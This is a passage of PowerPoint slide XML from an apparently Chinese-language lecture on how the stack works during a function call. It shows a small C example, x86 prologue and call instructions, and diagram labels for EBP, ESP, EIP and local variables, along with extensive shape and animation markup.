        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>int BFunc(int i,int j)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>  int m = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>  int n = 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>  m = i;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>  n = j;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>  return m;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27653" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68521D46-D731-F24A-9081-26F0EE572ED8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="1484313"/>
            <a:ext cx="4032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int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{AFunc(5,6); return 0;}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2404226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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ECCC7D-8E14-BC42-9270-5EBB8F031C4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="1412875"/>
            <a:ext cx="1511300" cy="5400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8852" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97046390-B1E1-0043-B836-2E22B677E2FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="5013325"/>
            <a:ext cx="1511300" cy="287338"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{723930C5-D1B6-C44F-886C-FD91D08CEEF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3635375" y="3932238"/>
            <a:ext cx="1681163" cy="366712"/>
            <a:chOff x="3273" y="3158"/>
            <a:chExt cx="1059" cy="231"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28698" name="Line 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C480094-63CE-0D4D-A893-EFD3CC4A9983}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3923" y="3294"/>
              <a:ext cx="40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9" name="Text Box 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACFCDCEA-0235-314A-82DA-D40A84A463A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3273" y="3158"/>
              <a:ext cx="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当前</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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92C784C5-047E-804E-838E-A947CF92796C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5202238" y="4797425"/>
            <a:ext cx="1674812" cy="366713"/>
            <a:chOff x="3277" y="2387"/>
            <a:chExt cx="1055" cy="231"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28696" name="Line 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11A3FC9B-FE70-8748-B931-561F7E8B33CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3923" y="2519"/>
              <a:ext cx="40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7" name="Text Box 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CB11C7E-E8BD-2B4D-862D-1D7B99AD2152}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3277" y="2387"/>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当前</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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28678" name="Text Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF665491-3298-7F4D-B1DF-A2DD900691F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="592138" y="1778000"/>
            <a:ext cx="34750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996666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AFunc(5,6)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="996666"/>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push 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push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call _AFunc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add esp+8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8861" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F8524E1-2BEF-0A41-B69D-879B066037C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="250825" y="1844675"/>
            <a:ext cx="360363" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 25000"/>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 name="Group 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{955CE20B-1DC2-2245-B66A-80D87A9241A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4284663" y="6256338"/>
            <a:ext cx="2592387" cy="366712"/>
            <a:chOff x="2699" y="3306"/>
            <a:chExt cx="1633" cy="231"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28694" name="Text Box 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E8DE640-D5B2-9242-AC25-954DF6B15EFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2699" y="3306"/>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语句执行前的</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28695" name="Line 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC4F51A-AA38-6344-947E-BC62912C4AE6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3923" y="3430"/>
              <a:ext cx="409"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 name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{116A61F5-9925-E44B-8B74-DF68FEC4C1FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4284663" y="5084763"/>
            <a:ext cx="2592387" cy="366712"/>
            <a:chOff x="2699" y="2568"/>
            <a:chExt cx="1633" cy="231"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28692" name="Text Box 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ABFAF9F-2552-6F49-8823-11F0398E00B5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2699" y="2568"/>
              <a:ext cx="1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语句执行前的</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28693" name="Line 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C648569D-271D-274D-A0FE-96B6D65FAEC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3923" y="2700"/>
              <a:ext cx="409" cy="4"/>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2" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08662EAA-0B24-7643-8C15-21696CAC791E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数调用中栈的工作过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78874" name="Rectangle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C44D19F-F862-E34B-8A91-F52677B57AEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="4724400"/>
            <a:ext cx="1511300" cy="287338"/>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78875" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE052116-9F4A-694E-9D74-0B5452CDC58C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="4437063"/>
            <a:ext cx="1511300" cy="287337"/>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EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78876" name="Text Box 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22103ED8-F7D3-FF40-BB2D-0297D83B5ABB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="592138" y="3938588"/>
            <a:ext cx="3332162"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996666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>_AFunc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push ebp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mov ebp,esp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sub esp,48h</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压入环境变量</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为局部变量分配空间</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8877" name="Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6727EA60-694E-9B49-BC10-CC5631A764F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="4149725"/>
            <a:ext cx="1511300" cy="287338"/>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EBP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78878" name="AutoShape 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D49B686-8DE4-624E-8F63-4E4DAA5BF8C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6588125" y="2565400"/>
            <a:ext cx="215900" cy="1584325"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 611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48h</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78879" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF72AE5-2BF1-674C-8198-31281444D5E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="1628775"/>
            <a:ext cx="1511300" cy="8636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EDI</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ESI</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EBX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78880" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F17C616-E571-FD44-8F9D-15CCE988F338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="3862388"/>
            <a:ext cx="1511300" cy="287337"/>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m=3</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78881" name="Rectangle 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EA23AA8-3EEB-384B-9CD5-1A72CB49DA9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6877050" y="3573463"/>
            <a:ext cx="1511300" cy="287337"/>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n=4</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78882" name="Line 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D702B934-5651-4B4E-BC6A-83150CE78085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5940425" y="4292600"/>
            <a:ext cx="1368425" cy="208915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6177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8861"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78861"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16"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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.38889E-6 -2.96296E-6 L 1.38889E-6 0.05255 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78861"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="2616"/>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8852"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78852"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78852"/>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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.38889E-6 0.05255 L 1.38889E-6 0.11551 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78861"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3148"/>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78874"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78874"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="78874"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#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64" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.33333E-6 0.01041 L 3.33333E-6 -0.03727 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-2384"/>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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="3" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
